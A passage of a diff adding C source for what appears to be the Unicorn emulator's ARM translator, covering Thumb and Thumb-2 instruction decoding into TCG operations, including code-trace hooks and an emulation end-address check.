*/ + if (arm_dc_feature(s, ARM_FEATURE_M)) { + tmp = load_reg(s, rn); + addr = tcg_const_i32(tcg_ctx, insn & 0xff); + gen_helper_v7m_msr(tcg_ctx, tcg_ctx->cpu_env, addr, tmp); + tcg_temp_free_i32(tcg_ctx, addr); + tcg_temp_free_i32(tcg_ctx, tmp); + gen_lookup_tb(s); + break; + } + /* fall through */ + case 1: /* msr spsr. */ + if (arm_dc_feature(s, ARM_FEATURE_M)) { + goto illegal_op; + } + tmp = load_reg(s, rn); + if (gen_set_psr(s, + msr_mask(s, (insn >> 8) & 0xf, op == 1), + op == 1, tmp)) + goto illegal_op; + break; + case 2: /* cps, nop-hint. */ + if (((insn >> 8) & 7) == 0) { + gen_nop_hint(s, insn & 0xff); + } + /* Implemented as NOP in user mode. */ + if (IS_USER(s)) + break; + offset = 0; + imm = 0; + if (insn & (1 << 10)) { + if (insn & (1 << 7)) + offset |= CPSR_A; + if (insn & (1 << 6)) + offset |= CPSR_I; + if (insn & (1 << 5)) + offset |= CPSR_F; + if (insn & (1 << 9)) + imm = CPSR_A | CPSR_I | CPSR_F; + } + if (insn & (1 << 8)) { + offset |= 0x1f; + imm |= (insn & 0x1f); + } + if (offset) { + gen_set_psr_im(s, offset, 0, imm); + } + break; + case 3: /* Special control operations. */ + ARCH(7); + op = (insn >> 4) & 0xf; + switch (op) { + case 2: /* clrex */ + gen_clrex(s); + break; + case 4: /* dsb */ + case 5: /* dmb */ + case 6: /* isb */ + /* These execute as NOPs. */ + break; + default: + goto illegal_op; + } + break; + case 4: /* bxj */ + /* Trivial implementation equivalent to bx. */ + tmp = load_reg(s, rn); + gen_bx(s, tmp); + break; + case 5: /* Exception return. */ + if (IS_USER(s)) { + goto illegal_op; + } + if (rn != 14 || rd != 15) { + goto illegal_op; + } + tmp = load_reg(s, rn); + tcg_gen_subi_i32(tcg_ctx, tmp, tmp, insn & 0xff); + gen_exception_return(s, tmp); + break; + case 6: /* mrs cpsr. 
*/ + tmp = tcg_temp_new_i32(tcg_ctx); + if (arm_dc_feature(s, ARM_FEATURE_M)) { + addr = tcg_const_i32(tcg_ctx, insn & 0xff); + gen_helper_v7m_mrs(tcg_ctx, tmp, tcg_ctx->cpu_env, addr); + tcg_temp_free_i32(tcg_ctx, addr); + } else { + gen_helper_cpsr_read(tcg_ctx, tmp, tcg_ctx->cpu_env); + } + store_reg(s, rd, tmp); + break; + case 7: /* mrs spsr. */ + /* Not accessible in user mode. */ + if (IS_USER(s) || arm_dc_feature(s, ARM_FEATURE_M)) { + goto illegal_op; + } + tmp = load_cpu_field(s->uc, spsr); + store_reg(s, rd, tmp); + break; + } + } + } else { + /* Conditional branch. */ + op = (insn >> 22) & 0xf; + /* Generate a conditional jump to next instruction. */ + s->condlabel = gen_new_label(tcg_ctx); + arm_gen_test_cc(tcg_ctx, op ^ 1, s->condlabel); + s->condjmp = 1; + + /* offset[11:1] = insn[10:0] */ + offset = (insn & 0x7ff) << 1; + /* offset[17:12] = insn[21:16]. */ + offset |= (insn & 0x003f0000) >> 4; + /* offset[31:20] = insn[26]. */ + offset |= ((int32_t)((insn << 5) & 0x80000000)) >> 11; + /* offset[18] = insn[13]. */ + offset |= (insn & (1 << 13)) << 5; + /* offset[19] = insn[11]. */ + offset |= (insn & (1 << 11)) << 8; + + /* jump to the offset */ + gen_jmp(s, s->pc + offset); + } + } else { + /* Data processing immediate. */ + if (insn & (1 << 25)) { + if (insn & (1 << 24)) { + if (insn & (1 << 20)) + goto illegal_op; + /* Bitfield/Saturate. */ + op = (insn >> 21) & 7; + imm = insn & 0x1f; + shift = ((insn >> 6) & 3) | ((insn >> 10) & 0x1c); + if (rn == 15) { + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, 0); + } else { + tmp = load_reg(s, rn); + } + switch (op) { + case 2: /* Signed bitfield extract. */ + imm++; + if (shift + imm > 32) + goto illegal_op; + if (imm < 32) + gen_sbfx(s, tmp, shift, imm); + break; + case 6: /* Unsigned bitfield extract. */ + imm++; + if (shift + imm > 32) + goto illegal_op; + if (imm < 32) + gen_ubfx(s, tmp, shift, (1u << imm) - 1); + break; + case 3: /* Bitfield insert/clear. 
*/ + if (imm < shift) + goto illegal_op; + imm = imm + 1 - shift; + if (imm != 32) { + tmp2 = load_reg(s, rd); + tcg_gen_deposit_i32(tcg_ctx, tmp, tmp2, tmp, shift, imm); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + break; + case 7: + goto illegal_op; + default: /* Saturate. */ + if (shift) { + if (op & 1) + tcg_gen_sari_i32(tcg_ctx, tmp, tmp, shift); + else + tcg_gen_shli_i32(tcg_ctx, tmp, tmp, shift); + } + tmp2 = tcg_const_i32(tcg_ctx, imm); + if (op & 4) { + /* Unsigned. */ + if ((op & 1) && shift == 0) + gen_helper_usat16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + else + gen_helper_usat(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + } else { + /* Signed. */ + if ((op & 1) && shift == 0) + gen_helper_ssat16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + else + gen_helper_ssat(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + break; + } + store_reg(s, rd, tmp); + } else { + imm = ((insn & 0x04000000) >> 15) + | ((insn & 0x7000) >> 4) | (insn & 0xff); + if (insn & (1 << 22)) { + /* 16-bit immediate. */ + imm |= (insn >> 4) & 0xf000; + if (insn & (1 << 23)) { + /* movt */ + tmp = load_reg(s, rd); + tcg_gen_ext16u_i32(tcg_ctx, tmp, tmp); + tcg_gen_ori_i32(tcg_ctx, tmp, tmp, imm << 16); + } else { + /* movw */ + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, imm); + } + } else { + /* Add/sub 12-bit immediate. */ + if (rn == 15) { + offset = s->pc & ~(uint32_t)3; + if (insn & (1 << 23)) + offset -= imm; + else + offset += imm; + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, offset); + } else { + tmp = load_reg(s, rn); + if (insn & (1 << 23)) + tcg_gen_subi_i32(tcg_ctx, tmp, tmp, imm); + else + tcg_gen_addi_i32(tcg_ctx, tmp, tmp, imm); + } + } + store_reg(s, rd, tmp); + } + } else { + int shifter_out = 0; + /* modified 12-bit immediate. */ + shift = ((insn & 0x04000000) >> 23) | ((insn & 0x7000) >> 12); + imm = (insn & 0xff); + switch (shift) { + case 0: /* XY */ + /* Nothing to do. 
*/ + break; + case 1: /* 00XY00XY */ + imm |= imm << 16; + break; + case 2: /* XY00XY00 */ + imm |= imm << 16; + imm <<= 8; + break; + case 3: /* XYXYXYXY */ + imm |= imm << 16; + imm |= imm << 8; + break; + default: /* Rotated constant. */ + shift = (shift << 1) | (imm >> 7); + imm |= 0x80; + imm = imm << (32 - shift); + shifter_out = 1; + break; + } + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp2, imm); + rn = (insn >> 16) & 0xf; + if (rn == 15) { + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, 0); + } else { + tmp = load_reg(s, rn); + } + op = (insn >> 21) & 0xf; + if (gen_thumb2_data_op(s, op, (insn & (1 << 20)) != 0, + shifter_out, tmp, tmp2)) + goto illegal_op; + tcg_temp_free_i32(tcg_ctx, tmp2); + rd = (insn >> 8) & 0xf; + if (rd != 15) { + store_reg(s, rd, tmp); + } else { + tcg_temp_free_i32(tcg_ctx, tmp); + } + } + } + break; + case 12: /* Load/store single data item. */ + { + int postinc = 0; + int writeback = 0; + int memidx; + if ((insn & 0x01100000) == 0x01000000) { + if (disas_neon_ls_insn(s, insn)) { + goto illegal_op; + } + break; + } + op = ((insn >> 21) & 3) | ((insn >> 22) & 4); + if (rs == 15) { + if (!(insn & (1 << 20))) { + goto illegal_op; + } + if (op != 2) { + /* Byte or halfword load space with dest == r15 : memory hints. + * Catch them early so we don't emit pointless addressing code. 
+ * This space is a mix of: + * PLD/PLDW/PLI, which we implement as NOPs (note that unlike + * the ARM encodings, PLDW space doesn't UNDEF for non-v7MP + * cores) + * unallocated hints, which must be treated as NOPs + * UNPREDICTABLE space, which we NOP or UNDEF depending on + * which is easiest for the decoding logic + * Some space which must UNDEF + */ + int op1 = (insn >> 23) & 3; + int op2 = (insn >> 6) & 0x3f; + if (op & 2) { + goto illegal_op; + } + if (rn == 15) { + /* UNPREDICTABLE, unallocated hint or + * PLD/PLDW/PLI (literal) + */ + return 0; + } + if (op1 & 1) { + return 0; /* PLD/PLDW/PLI or unallocated hint */ + } + if ((op2 == 0) || ((op2 & 0x3c) == 0x30)) { + return 0; /* PLD/PLDW/PLI or unallocated hint */ + } + /* UNDEF space, or an UNPREDICTABLE */ + return 1; + } + } + memidx = get_mem_index(s); + if (rn == 15) { + addr = tcg_temp_new_i32(tcg_ctx); + /* PC relative. */ + /* s->pc has already been incremented by 4. */ + imm = s->pc & 0xfffffffc; + if (insn & (1 << 23)) + imm += insn & 0xfff; + else + imm -= insn & 0xfff; + tcg_gen_movi_i32(tcg_ctx, addr, imm); + } else { + addr = load_reg(s, rn); + if (insn & (1 << 23)) { + /* Positive offset. */ + imm = insn & 0xfff; + tcg_gen_addi_i32(tcg_ctx, addr, addr, imm); + } else { + imm = insn & 0xff; + switch ((insn >> 8) & 0xf) { + case 0x0: /* Shifted Register. */ + shift = (insn >> 4) & 0xf; + if (shift > 3) { + tcg_temp_free_i32(tcg_ctx, addr); + goto illegal_op; + } + tmp = load_reg(s, rm); + if (shift) + tcg_gen_shli_i32(tcg_ctx, tmp, tmp, shift); + tcg_gen_add_i32(tcg_ctx, addr, addr, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 0xc: /* Negative offset. */ + tcg_gen_addi_i32(tcg_ctx, addr, addr, 0-imm); + break; + case 0xe: /* User privilege. */ + tcg_gen_addi_i32(tcg_ctx, addr, addr, imm); + memidx = MMU_USER_IDX; + break; + case 0x9: /* Post-decrement. */ + imm = 0-imm; + /* Fall through. */ + case 0xb: /* Post-increment. 
*/ + postinc = 1; + writeback = 1; + break; + case 0xd: /* Pre-decrement. */ + imm = 0-imm; + /* Fall through. */ + case 0xf: /* Pre-increment. */ + tcg_gen_addi_i32(tcg_ctx, addr, addr, imm); + writeback = 1; + break; + default: + tcg_temp_free_i32(tcg_ctx, addr); + goto illegal_op; + } + } + } + if (insn & (1 << 20)) { + /* Load. */ + tmp = tcg_temp_new_i32(tcg_ctx); + switch (op) { + case 0: + gen_aa32_ld8u(s, tmp, addr, memidx); + break; + case 4: + gen_aa32_ld8s(s, tmp, addr, memidx); + break; + case 1: + gen_aa32_ld16u(s, tmp, addr, memidx); + break; + case 5: + gen_aa32_ld16s(s, tmp, addr, memidx); + break; + case 2: + gen_aa32_ld32u(s, tmp, addr, memidx); + break; + default: + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, addr); + goto illegal_op; + } + if (rs == 15) { + gen_bx(s, tmp); + } else { + store_reg(s, rs, tmp); + } + } else { + /* Store. */ + tmp = load_reg(s, rs); + switch (op) { + case 0: + gen_aa32_st8(s, tmp, addr, memidx); + break; + case 1: + gen_aa32_st16(s, tmp, addr, memidx); + break; + case 2: + gen_aa32_st32(s, tmp, addr, memidx); + break; + default: + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, addr); + goto illegal_op; + } + tcg_temp_free_i32(tcg_ctx, tmp); + } + if (postinc) + tcg_gen_addi_i32(tcg_ctx, addr, addr, imm); + if (writeback) { + store_reg(s, rn, addr); + } else { + tcg_temp_free_i32(tcg_ctx, addr); + } + } + break; + default: + goto illegal_op; + } + return 0; +illegal_op: + return 1; +} + +static void disas_thumb_insn(CPUARMState *env, DisasContext *s) // qq +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint32_t val, insn, op, rm, rn, rd, shift, cond; + int32_t offset; + int i; + TCGv_i32 tmp; + TCGv_i32 tmp2; + TCGv_i32 addr; + + // Unicorn: end address tells us to stop emulation + if (s->pc == s->uc->addr_end) { + // imitate WFI instruction to halt emulation + s->is_jmp = DISAS_WFI; + return; + } + + if (s->condexec_mask) { + cond = s->condexec_cond; + if (cond != 0x0e) { /* Skip 
conditional when condition is AL. */ + s->condlabel = gen_new_label(tcg_ctx); + arm_gen_test_cc(tcg_ctx, cond ^ 1, s->condlabel); + s->condjmp = 1; + } + } + + insn = arm_lduw_code(env, s->pc, s->bswap_code); + + // Unicorn: trace this instruction on request + if (HOOK_EXISTS_BOUNDED(s->uc, UC_HOOK_CODE, s->pc)) { + // determine instruction size (Thumb/Thumb2) + switch(insn & 0xf800) { + // Thumb2: 32-bit + case 0xe800: + case 0xf000: + case 0xf800: + gen_uc_tracecode(tcg_ctx, 4, UC_HOOK_CODE_IDX, s->uc, s->pc); + break; + // Thumb: 16-bit + default: + gen_uc_tracecode(tcg_ctx, 2, UC_HOOK_CODE_IDX, s->uc, s->pc); + break; + } + // the callback might want to stop emulation immediately + check_exit_request(tcg_ctx); + } + + s->pc += 2; + + switch (insn >> 12) { + case 0: case 1: + + rd = insn & 7; + op = (insn >> 11) & 3; + if (op == 3) { + /* add/subtract */ + rn = (insn >> 3) & 7; + tmp = load_reg(s, rn); + if (insn & (1 << 10)) { + /* immediate */ + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp2, (insn >> 6) & 7); + } else { + /* reg */ + rm = (insn >> 6) & 7; + tmp2 = load_reg(s, rm); + } + if (insn & (1 << 9)) { + if (s->condexec_mask) + tcg_gen_sub_i32(tcg_ctx, tmp, tmp, tmp2); + else + gen_sub_CC(s, tmp, tmp, tmp2); + } else { + if (s->condexec_mask) + tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); + else + gen_add_CC(s, tmp, tmp, tmp2); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + } else { + /* shift immediate */ + rm = (insn >> 3) & 7; + shift = (insn >> 6) & 0x1f; + tmp = load_reg(s, rm); + gen_arm_shift_im(s, tmp, op, shift, s->condexec_mask == 0); + if (!s->condexec_mask) + gen_logic_CC(s, tmp); + store_reg(s, rd, tmp); + } + break; + case 2: case 3: + /* arithmetic large immediate */ + op = (insn >> 11) & 3; + rd = (insn >> 8) & 0x7; + if (op == 0) { /* mov */ + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, insn & 0xff); + if (!s->condexec_mask) + gen_logic_CC(s, tmp); + store_reg(s, rd, tmp); + } 
else { + tmp = load_reg(s, rd); + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp2, insn & 0xff); + switch (op) { + case 1: /* cmp */ + gen_sub_CC(s, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, tmp2); + break; + case 2: /* add */ + if (s->condexec_mask) + tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); + else + gen_add_CC(s, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + break; + case 3: /* sub */ + if (s->condexec_mask) + tcg_gen_sub_i32(tcg_ctx, tmp, tmp, tmp2); + else + gen_sub_CC(s, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + break; + } + } + break; + case 4: + if (insn & (1 << 11)) { + rd = (insn >> 8) & 7; + /* load pc-relative. Bit 1 of PC is ignored. */ + val = s->pc + 2 + ((insn & 0xff) * 4); + val &= ~(uint32_t)2; + addr = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, addr, val); + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, addr); + store_reg(s, rd, tmp); + break; + } + if (insn & (1 << 10)) { + /* data processing extended or blx */ + rd = (insn & 7) | ((insn >> 4) & 8); + rm = (insn >> 3) & 0xf; + op = (insn >> 8) & 3; + switch (op) { + case 0: /* add */ + tmp = load_reg(s, rd); + tmp2 = load_reg(s, rm); + tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + break; + case 1: /* cmp */ + tmp = load_reg(s, rd); + tmp2 = load_reg(s, rm); + gen_sub_CC(s, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 2: /* mov/cpy */ + tmp = load_reg(s, rm); + store_reg(s, rd, tmp); + break; + case 3:/* branch [and link] exchange thumb register */ + tmp = load_reg(s, rm); + if (insn & (1 << 7)) { + ARCH(5); + val = (uint32_t)s->pc | 1; + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp2, val); + store_reg(s, 14, tmp2); + } + /* already thumb, no need to check 
*/ + gen_bx(s, tmp); + break; + } + break; + } + + /* data processing register */ + rd = insn & 7; + rm = (insn >> 3) & 7; + op = (insn >> 6) & 0xf; + if (op == 2 || op == 3 || op == 4 || op == 7) { + /* the shift/rotate ops want the operands backwards */ + val = rm; + rm = rd; + rd = val; + val = 1; + } else { + val = 0; + } + + if (op == 9) { /* neg */ + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, 0); + } else if (op != 0xf) { /* mvn doesn't read its first operand */ + tmp = load_reg(s, rd); + } else { + TCGV_UNUSED_I32(tmp); + } + + tmp2 = load_reg(s, rm); + switch (op) { + case 0x0: /* and */ + tcg_gen_and_i32(tcg_ctx, tmp, tmp, tmp2); + if (!s->condexec_mask) + gen_logic_CC(s, tmp); + break; + case 0x1: /* eor */ + tcg_gen_xor_i32(tcg_ctx, tmp, tmp, tmp2); + if (!s->condexec_mask) + gen_logic_CC(s, tmp); + break; + case 0x2: /* lsl */ + if (s->condexec_mask) { + gen_shl(s, tmp2, tmp2, tmp); + } else { + gen_helper_shl_cc(tcg_ctx, tmp2, tcg_ctx->cpu_env, tmp2, tmp); + gen_logic_CC(s, tmp2); + } + break; + case 0x3: /* lsr */ + if (s->condexec_mask) { + gen_shr(s, tmp2, tmp2, tmp); + } else { + gen_helper_shr_cc(tcg_ctx, tmp2, tcg_ctx->cpu_env, tmp2, tmp); + gen_logic_CC(s, tmp2); + } + break; + case 0x4: /* asr */ + if (s->condexec_mask) { + gen_sar(s, tmp2, tmp2, tmp); + } else { + gen_helper_sar_cc(tcg_ctx, tmp2, tcg_ctx->cpu_env, tmp2, tmp); + gen_logic_CC(s, tmp2); + } + break; + case 0x5: /* adc */ + if (s->condexec_mask) { + gen_adc(s, tmp, tmp2); + } else { + gen_adc_CC(s, tmp, tmp, tmp2); + } + break; + case 0x6: /* sbc */ + if (s->condexec_mask) { + gen_sub_carry(s, tmp, tmp, tmp2); + } else { + gen_sbc_CC(s, tmp, tmp, tmp2); + } + break; + case 0x7: /* ror */ + if (s->condexec_mask) { + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0x1f); + tcg_gen_rotr_i32(tcg_ctx, tmp2, tmp2, tmp); + } else { + gen_helper_ror_cc(tcg_ctx, tmp2, tcg_ctx->cpu_env, tmp2, tmp); + gen_logic_CC(s, tmp2); + } + break; + case 0x8: /* tst */ + 
tcg_gen_and_i32(tcg_ctx, tmp, tmp, tmp2); + gen_logic_CC(s, tmp); + rd = 16; + break; + case 0x9: /* neg */ + if (s->condexec_mask) + tcg_gen_neg_i32(tcg_ctx, tmp, tmp2); + else + gen_sub_CC(s, tmp, tmp, tmp2); + break; + case 0xa: /* cmp */ + gen_sub_CC(s, tmp, tmp, tmp2); + rd = 16; + break; + case 0xb: /* cmn */ + gen_add_CC(s, tmp, tmp, tmp2); + rd = 16; + break; + case 0xc: /* orr */ + tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); + if (!s->condexec_mask) + gen_logic_CC(s, tmp); + break; + case 0xd: /* mul */ + tcg_gen_mul_i32(tcg_ctx, tmp, tmp, tmp2); + if (!s->condexec_mask) + gen_logic_CC(s, tmp); + break; + case 0xe: /* bic */ + tcg_gen_andc_i32(tcg_ctx, tmp, tmp, tmp2); + if (!s->condexec_mask) + gen_logic_CC(s, tmp); + break; + case 0xf: /* mvn */ + tcg_gen_not_i32(tcg_ctx, tmp2, tmp2); + if (!s->condexec_mask) + gen_logic_CC(s, tmp2); + val = 1; + rm = rd; + break; + } + if (rd != 16) { + if (val) { + store_reg(s, rm, tmp2); + if (op != 0xf) + tcg_temp_free_i32(tcg_ctx, tmp); + } else { + store_reg(s, rd, tmp); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + } else { + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + break; + + case 5: + /* load/store register offset. 
*/ + rd = insn & 7; + rn = (insn >> 3) & 7; + rm = (insn >> 6) & 7; + op = (insn >> 9) & 7; + addr = load_reg(s, rn); + tmp = load_reg(s, rm); + tcg_gen_add_i32(tcg_ctx, addr, addr, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + + if (op < 3) { /* store */ + tmp = load_reg(s, rd); + } else { + tmp = tcg_temp_new_i32(tcg_ctx); + } + + switch (op) { + case 0: /* str */ + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + break; + case 1: /* strh */ + gen_aa32_st16(s, tmp, addr, get_mem_index(s)); + break; + case 2: /* strb */ + gen_aa32_st8(s, tmp, addr, get_mem_index(s)); + break; + case 3: /* ldrsb */ + gen_aa32_ld8s(s, tmp, addr, get_mem_index(s)); + break; + case 4: /* ldr */ + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + break; + case 5: /* ldrh */ + gen_aa32_ld16u(s, tmp, addr, get_mem_index(s)); + break; + case 6: /* ldrb */ + gen_aa32_ld8u(s, tmp, addr, get_mem_index(s)); + break; + case 7: /* ldrsh */ + gen_aa32_ld16s(s, tmp, addr, get_mem_index(s)); + break; + } + if (op >= 3) { /* load */ + store_reg(s, rd, tmp); + } else { + tcg_temp_free_i32(tcg_ctx, tmp); + } + tcg_temp_free_i32(tcg_ctx, addr); + break; + + case 6: + /* load/store word immediate offset */ + rd = insn & 7; + rn = (insn >> 3) & 7; + addr = load_reg(s, rn); + val = (insn >> 4) & 0x7c; + tcg_gen_addi_i32(tcg_ctx, addr, addr, val); + + if (insn & (1 << 11)) { + /* load */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + store_reg(s, rd, tmp); + } else { + /* store */ + tmp = load_reg(s, rd); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + } + tcg_temp_free_i32(tcg_ctx, addr); + break; + + case 7: + /* load/store byte immediate offset */ + rd = insn & 7; + rn = (insn >> 3) & 7; + addr = load_reg(s, rn); + val = (insn >> 6) & 0x1f; + tcg_gen_addi_i32(tcg_ctx, addr, addr, val); + + if (insn & (1 << 11)) { + /* load */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld8u(s, tmp, addr, get_mem_index(s)); + store_reg(s, rd, 
tmp); + } else { + /* store */ + tmp = load_reg(s, rd); + gen_aa32_st8(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + } + tcg_temp_free_i32(tcg_ctx, addr); + break; + + case 8: + /* load/store halfword immediate offset */ + rd = insn & 7; + rn = (insn >> 3) & 7; + addr = load_reg(s, rn); + val = (insn >> 5) & 0x3e; + tcg_gen_addi_i32(tcg_ctx, addr, addr, val); + + if (insn & (1 << 11)) { + /* load */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld16u(s, tmp, addr, get_mem_index(s)); + store_reg(s, rd, tmp); + } else { + /* store */ + tmp = load_reg(s, rd); + gen_aa32_st16(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + } + tcg_temp_free_i32(tcg_ctx, addr); + break; + + case 9: + /* load/store from stack */ + rd = (insn >> 8) & 7; + addr = load_reg(s, 13); + val = (insn & 0xff) * 4; + tcg_gen_addi_i32(tcg_ctx, addr, addr, val); + + if (insn & (1 << 11)) { + /* load */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + store_reg(s, rd, tmp); + } else { + /* store */ + tmp = load_reg(s, rd); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + } + tcg_temp_free_i32(tcg_ctx, addr); + break; + + case 10: + /* add to high reg */ + rd = (insn >> 8) & 7; + if (insn & (1 << 11)) { + /* SP */ + tmp = load_reg(s, 13); + } else { + /* PC. bit 1 is ignored. */ + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, (s->pc + 2) & ~(uint32_t)2); + } + val = (insn & 0xff) * 4; + tcg_gen_addi_i32(tcg_ctx, tmp, tmp, val); + store_reg(s, rd, tmp); + break; + + case 11: + /* misc */ + op = (insn >> 8) & 0xf; + switch (op) { + case 0: + /* adjust stack pointer */ + tmp = load_reg(s, 13); + val = (insn & 0x7f) * 4; + if (insn & (1 << 7)) + val = -(int32_t)val; + tcg_gen_addi_i32(tcg_ctx, tmp, tmp, val); + store_reg(s, 13, tmp); + break; + + case 2: /* sign/zero extend. 
*/ + ARCH(6); + rd = insn & 7; + rm = (insn >> 3) & 7; + tmp = load_reg(s, rm); + switch ((insn >> 6) & 3) { + case 0: gen_sxth(tmp); break; + case 1: gen_sxtb(tmp); break; + case 2: gen_uxth(tmp); break; + case 3: gen_uxtb(tmp); break; + } + store_reg(s, rd, tmp); + break; + case 4: case 5: case 0xc: case 0xd: + /* push/pop */ + addr = load_reg(s, 13); + if (insn & (1 << 8)) + offset = 4; + else + offset = 0; + for (i = 0; i < 8; i++) { + if (insn & (1 << i)) + offset += 4; + } + if ((insn & (1 << 11)) == 0) { + tcg_gen_addi_i32(tcg_ctx, addr, addr, -offset); + } + for (i = 0; i < 8; i++) { + if (insn & (1 << i)) { + if (insn & (1 << 11)) { + /* pop */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + store_reg(s, i, tmp); + } else { + /* push */ + tmp = load_reg(s, i); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + } + /* advance to the next address. */ + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + } + } + TCGV_UNUSED_I32(tmp); + if (insn & (1 << 8)) { + if (insn & (1 << 11)) { + /* pop pc */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + /* don't set the pc until the rest of the instruction + has completed */ + } else { + /* push lr */ + tmp = load_reg(s, 14); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + } + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + } + if ((insn & (1 << 11)) == 0) { + tcg_gen_addi_i32(tcg_ctx, addr, addr, -offset); + } + /* write back the new stack pointer */ + store_reg(s, 13, addr); + /* set the new PC value */ + if ((insn & 0x0900) == 0x0900) { + store_reg_from_load(s, 15, tmp); + } + break; + + case 1: case 3: case 9: case 11: /* czb */ + rm = insn & 7; + tmp = load_reg(s, rm); + s->condlabel = gen_new_label(tcg_ctx); + s->condjmp = 1; + if (insn & (1 << 11)) + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tmp, 0, s->condlabel); + else + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, tmp, 0, 
s->condlabel); + tcg_temp_free_i32(tcg_ctx, tmp); + offset = ((insn & 0xf8) >> 2) | (insn & 0x200) >> 3; + val = (uint32_t)s->pc + 2; + val += offset; + gen_jmp(s, val); + break; + + case 15: /* IT, nop-hint. */ + if ((insn & 0xf) == 0) { + gen_nop_hint(s, (insn >> 4) & 0xf); + break; + } + /* If Then. */ + s->condexec_cond = (insn >> 4) & 0xe; + s->condexec_mask = insn & 0x1f; + /* No actual code generated for this insn, just setup state. */ + break; + + case 0xe: /* bkpt */ + { + int imm8 = extract32(insn, 0, 8); + ARCH(5); + gen_exception_insn(s, 2, EXCP_BKPT, syn_aa32_bkpt(imm8, true)); + break; + } + + case 0xa: /* rev */ + ARCH(6); + rn = (insn >> 3) & 0x7; + rd = insn & 0x7; + tmp = load_reg(s, rn); + switch ((insn >> 6) & 3) { + case 0: tcg_gen_bswap32_i32(tcg_ctx, tmp, tmp); break; + case 1: gen_rev16(s, tmp); break; + case 3: gen_revsh(s, tmp); break; + default: goto illegal_op; + } + store_reg(s, rd, tmp); + break; + + case 6: + switch ((insn >> 5) & 7) { + case 2: + /* setend */ + ARCH(6); + if (((insn >> 3) & 1) != s->bswap_code) { + /* Dynamic endianness switching not implemented. 
